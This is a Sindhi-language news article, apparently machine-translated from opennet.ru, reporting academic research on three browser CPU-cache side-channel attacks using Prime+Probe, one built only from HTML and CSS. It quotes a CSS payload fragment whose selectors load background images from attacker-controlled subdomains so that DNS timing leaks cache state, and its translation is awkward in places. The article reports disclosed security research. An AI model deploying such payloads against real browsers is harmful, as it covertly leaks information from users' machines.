سي پي يو ڪيش ڪڍڻ واري حملي کي بغير جاوا اسڪرپٽ جي ويب برائوزر ۾ لاڳو ڪيو ويو آهي

ڪيترن ئي آمريڪي، اسرائيلي ۽ آسٽريليا يونيورسٽين جي محققن جي هڪ ٽيم ٽي حملا ٺاهيا آهن جيڪي ويب برائوزرن تي هلن ٿا پروسيسر ڪيش جي مواد بابت معلومات ڪڍڻ لاء. هڪ طريقو جاوا اسڪرپٽ کان سواءِ برائوزرن ۾ ڪم ڪري ٿو، ۽ ٻيا ٻه بائي پاس موجوده طريقن جي حفاظت ڪن ٿا سائڊ چينل حملن جي خلاف، جن ۾ Tor برائوزر ۽ DeterFox ۾ استعمال ٿيل آهن. حملن جي نمائش لاءِ ڪوڊ، گڏوگڏ حملن لاءِ ضروري سرور جا حصا، GitHub تي شايع ٿيل آهن.

ڪيش جي مواد جو تجزيو ڪرڻ لاءِ، سڀئي حملا استعمال ڪن ٿا Prime+Probe طريقو، جنهن ۾ ڪيش کي قدرن جي معياري سيٽ سان ڀرڻ ۽ انهن کي ٻيهر ڀرڻ وقت انهن تائين پهچ جي وقت کي ماپڻ سان تبديلين جو پتو لڳائڻ شامل آهي. برائوزرن ۾ موجود حفاظتي ميکانيزم کي نظرانداز ڪرڻ لاءِ جيڪي وقت جي درست ماپ ۾ مداخلت ڪن ٿا، ٻن اختيارن ۾، حملي ڪندڙ جي ڪنٽرول ڪيل DNS يا ويب ساکٽ سرور کي اپيل ڪئي وئي آهي، جيڪو وصول ٿيل درخواستن جي وقت جو لاگ ان رکي ٿو. ھڪڙي نموني ۾، ھڪڙو مقرر ٿيل DNS جوابي وقت استعمال ڪيو ويندو آھي وقت جي حوالي سان.

خارجي DNS يا WebSocket سرور استعمال ڪندي ماپون ڪيون ويون، مشين لرننگ جي بنياد تي درجه بندي سسٽم استعمال ڪندي، قدرن جي اڳڪٿي ڪرڻ لاءِ ڪافي ھيون 98% جي درستگي سان تمام بھترين منظرنامي ۾ (اوسط 80-90%). حملي جا طريقا مختلف هارڊويئر پليٽ فارمن تي آزمايا ويا آهن (Intel، AMD Ryzen، Apple M1، Samsung Exynos) ۽ عالمي ثابت ٿيا آهن.

سي پي يو ڪيش ڪڍڻ واري حملي کي بغير جاوا اسڪرپٽ جي ويب برائوزر ۾ لاڳو ڪيو ويو آهي

ڊي اين ايس ريسنگ حملي جو پهريون قسم جاوا اسڪرپٽ صفن کي استعمال ڪندي Prime+Probe طريقي جو هڪ کلاسک نفاذ استعمال ڪري ٿو. اختلاف خارجي DNS-بنياد ٽائمر ۽ هڪ اونارر هينڊلر جي استعمال تي اڀرن ٿا، جيڪو تڏهن شروع ٿئي ٿو جڏهن هڪ غير موجود ڊومين مان تصوير لوڊ ڪرڻ جي ڪوشش ڪئي وڃي ٿي. هڪ خارجي ٽائمر اجازت ڏئي ٿو Prime+Probe حملي جي انهن برائوزرن تي جيڪي JavaScript ٽائمرز تائين پهچ کي محدود يا مڪمل طور بند ڪن ٿا.

ساڳئي Ethernet نيٽ ورڪ تي واقع هڪ DNS سرور لاءِ، ٽائمر جي درستگي جو اندازو لڳ ڀڳ 2 ms آهي، جيڪو هڪ پاسي واري چينل جي حملي کي انجام ڏيڻ لاءِ ڪافي آهي (مقابلي لاءِ، Tor Browser ۾ معياري JavaScript ٽائمر جي درستگي آهي. گھٽجي ويو 100 ms). حملي لاءِ، DNS سرور تي ڪنٽرول جي ضرورت نه آهي، ڇاڪاڻ ته آپريشن جي عمل جو وقت چونڊيو ويو آهي ته جيئن DNS کان جوابي وقت چيڪ جي اڳئين مڪمل ٿيڻ جي نشاني طور ڪم ڪري ٿو (ان تي منحصر ڪري ٿو ته ڇا اونرر هينڊلر کي متحرڪ ڪيو ويو هو. اڳ يا بعد ۾، ڪيش سان چيڪ آپريشن جي رفتار بابت هڪ نتيجو ڪڍيو ويو آهي).

ٻئي حملي جو طريقو، "اسٽرنگ ۽ ساک" جو مقصد سيڪيورٽي ٽيڪنالاجي کي نظرانداز ڪرڻ آهي جيڪي جاوا اسڪرپٽ ۾ صفن جي گھٽ سطح جي استعمال کي محدود ڪن ٿيون. صفن جي بدران، اسٽرنگ ۽ ساک تمام وڏي اسٽرنگ تي عملن کي استعمال ڪندو آهي، جنهن جي سائيز کي چونڊيو ويو آهي ته متغير پوري ايل ايل ڪيش (آخري سطح ڪيش) کي ڍڪيندو آهي. اڳيون، indexOf() فنڪشن کي استعمال ڪندي، اسٽرنگ ۾ هڪ ننڍڙو سب اسٽرنگ ڳولهيو ويندو آهي، جيڪو شروعاتي طور تي سورس اسٽرنگ ۾ غير حاضر هوندو آهي، يعني. سرچ آپريشن جي نتيجي ۾ سڄي اسٽرنگ تي ورجائي ٿي. جيئن ته لائن جي سائيز ايل ايل ڪيش جي سائيز سان ملندڙ آهي، اسڪيننگ توهان کي ڪيش چيڪ آپريشن کي انجام ڏيڻ جي اجازت ڏئي ٿي بغير ڪنهن کي ترتيب ڏيڻ کان سواء. دير کي ماپڻ لاءِ، ڊي اين ايس جي بدران، حملي ڪندڙ جي ڪنٽرول ڪيل ويب ساڪٽ سرور تي ڪال ڪئي ويندي آهي - سرچ آپريشن مڪمل ٿيڻ کان اڳ ۽ پوءِ، سوالن کي قطار ۾ موڪليو ويندو آهي، جنهن جي بنياد تي سرور ڪيش جي تجزيي لاءِ استعمال ٿيندڙ دير جي حساب ڪري ٿو. مواد.

"CSS PP0" حملي جو ٽيون نسخو HTML ۽ CSS ذريعي لاڳو ڪيو ويو آهي، ۽ جاوا اسڪرپٽ بند ٿيل برائوزرن ۾ ڪم ڪري سگھي ٿو. طريقو "String ۽ Sock" سان ملندڙ جلندڙ آهي، پر جاوا اسڪرپٽ سان ڳنڍيل ناهي. حملي دوران، سي ايس ايس چونڊيندڙن جو هڪ سيٽ ٺاهيل آهي جيڪو ماسڪ ذريعي ڳولي ٿو. ابتدائي وڏي اسٽرنگ جيڪا ڪيش کي ڀريندي آهي هڪ تمام وڏي طبقي جي نالي سان هڪ ڊيو ٽيگ ٺاهي ترتيب ڏيندي آهي. اندر اتي ٻين ڊويزن جو هڪ سيٽ آهي انهن جي پنهنجي سڃاڻپ ڪندڙ سان. انهن nested divs مان هر هڪ چونڊيندڙ سان گڏ پنهنجو انداز آهي جيڪو سب اسٽرينگ جي ڳولا ڪري ٿو. جڏهن هڪ صفحي کي رينجر ڪري رهيو آهي، برائوزر پهريون ڀيرو اندروني ڊويزن کي پروسيس ڪرڻ جي ڪوشش ڪري ٿو، جنهن جي نتيجي ۾ هڪ وڏي قطار تي سرچ آپريشن. ڳولا عمدي طور تي غائب ٿيل ماسڪ استعمال ڪندي ڪئي وئي آهي ۽ پوري لڪير تي ورجائي ٿي ، جنهن کان پوءِ ”نه“ حالت شروع ڪئي وئي ۽ بي ترتيب ڊومينز جي حوالي سان پس منظر واري تصوير لوڊ ڪرڻ جي ڪوشش ڪئي وئي: #pp:not([class*=’xjtoxg’]) #s0 {background-image: url(«https://qdlvibmr.helldomain.oy.ne.ro»);} #pp:not([class*=’gzstxf’]) #s1 {background-image: url(«https://licfsdju.helldomain.oy.ne.ro»);} … ايڪس ايڪس ...

ذيلي ڊومينز حملي ڪندڙ جي ڊي اين ايس سرور طرفان خدمت ڪئي وئي آهي، جيڪي درخواستون حاصل ڪرڻ ۾ دير جي ماپ ڪري سگهن ٿيون. DNS سرور NXDOMAIN سڀني درخواستن لاءِ جاري ڪري ٿو ۽ درخواستن جي صحيح وقت جو لاگ رکي ٿو. divs جي هڪ سيٽ جي پروسيسنگ جي نتيجي ۾، حملي ڪندڙ جي DNS سرور کي درخواستن جو هڪ سلسلو ملي ٿو، جنهن جي وچ ۾ دير سان تعلق رکي ٿو ڪيش جي مواد کي جانچڻ جي نتيجي سان.

سي پي يو ڪيش ڪڍڻ واري حملي کي بغير جاوا اسڪرپٽ جي ويب برائوزر ۾ لاڳو ڪيو ويو آهي


جو ذريعو: opennet.ru

تبصرو شامل ڪريو